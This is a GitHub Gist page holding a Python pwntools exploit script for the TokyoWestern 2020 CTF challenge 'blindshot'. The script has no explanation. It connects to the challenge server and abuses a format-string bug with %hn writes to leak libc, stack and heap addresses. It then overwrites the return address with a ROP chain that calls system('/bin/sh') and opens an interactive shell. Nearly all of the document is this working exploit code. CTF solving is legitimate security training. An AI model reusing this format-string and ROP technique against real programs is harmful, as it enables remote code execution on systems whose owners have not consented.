Last active
September 21, 2020 02:19
-
-
Save d4em0n/48d7644972bfca06e10186018ca9f593 to your computer and use it in GitHub Desktop.
TokyoWestern 2020 blindshot exploit script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import random | |
| p = 0 | |
| while True: | |
| try: | |
| # p = process("./blindshot") | |
| p = remote("pwn01.chal.ctf.westerns.tokyo", 12463) | |
| libc = ELF("./libc-2.31.so", checksec=False) | |
| off = 0xb80 | |
| off = 0x8 | off << 4 | |
| off_fd = off+20 # file descriptor location | |
| point_service = (off_fd&0xf000)+0x1000+0x8e # overwrite first byte return address to 0x8e | |
| point_service2 = (off&0xf000)+0x1000+0x8e # overwrite first byte return address to 0x8e | |
| set_fd1 = ((point_service)&0xf000)+0x1000+0x1 # overwrite fd to 1 | |
| tmp = point_service2 | |
| set_fd1 = set_fd1 - point_service | |
| point_service = point_service-off_fd | |
| point_service2 = point_service2-off | |
| p.sendlineafter(">", "%{}x%c%c%c%hn%9x%c%c%c%c%c%c%c%c%c%c%c%hn%{}x%48$hhn%{}x%46$hhn".format(off-3, point_service,set_fd1)) | |
| p.sendlineafter(">", "%{}x%c%c%c%hn%9x%c%c%c%c%c%c%c%c%c%c%c%hn%{}x%48$hhn%{}x%46$hhn|yes|".format(off-3, point_service,set_fd1)+"%16$p|%5$p|%9$p|") | |
| p.recvuntil("|yes|") | |
| libc_base = int(p.recvuntil("|", drop=True),16) - 159923 | |
| stack_leak = int(p.recvuntil("|", drop=True),16) | |
| heap_leak = int(p.recvuntil("|", drop=True),16) | |
| if libc_base & 0xfff != 0: | |
| p.close() | |
| continue | |
| except: | |
| p.close() | |
| continue | |
| libc.address = libc_base | |
| print(hex(libc_base)) | |
| print(hex(stack_leak)) | |
| print(hex(heap_leak)) | |
| pop_rdi = 0x0000000000026b72+libc_base | |
| set_fd1 += 2 # set fd to 3 | |
| ret_loc = (stack_leak-256)&0xffffffff | |
| rbp_loc = (stack_leak-296)&0xffffffff | |
| bof = stack_leak-1080 | |
| p.sendlineafter(">", "%{}x%c%c%c%hn%9x%c%c%c%c%c%c%c%c%c%c%c%hn%{}x%48$hhn%{}x%46$hhn".format(off-3, point_service,set_fd1)) | |
| ret = 0x0000000000025679+libc_base | |
| def write16(offset32, nilai): | |
| global tmp | |
| kk = (((tmp)&0xf00000)+0x100000+(offset32&0xffff))-tmp | |
| p.sendline("%{}x%c%c%c%hn%{}x%48$hhn%{}x%33$hn".format(off-3, point_service2,kk)) | |
| setk = ((tmp)&0xf00000)+0x100000+nilai - tmp | |
| p.sendline("%{}x%c%c%c%hn%{}x%48$hhn%{}x%46$hn".format(off-3, point_service2,setk)) | |
| def write32(offset32, nilai): | |
| nilai1 = nilai&0xffff | |
| nilai2 = nilai>>16 | |
| write16(offset32,nilai1) | |
| write16(offset32+2,nilai2) | |
| def write64(offset32, nilai): | |
| nilai1 = nilai&0xffffffff | |
| nilai2 = nilai>>32 | |
| write32(offset32+4,nilai2) | |
| write32(offset32,nilai1) | |
| write64(ret_loc, pop_rdi) | |
| write64(ret_loc+8, next(libc.search(b"/bin/sh"))) | |
| write64(ret_loc+16, pop_rdi+1) # ret | |
| write64(ret_loc+24, libc.symbols['system']) | |
| p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment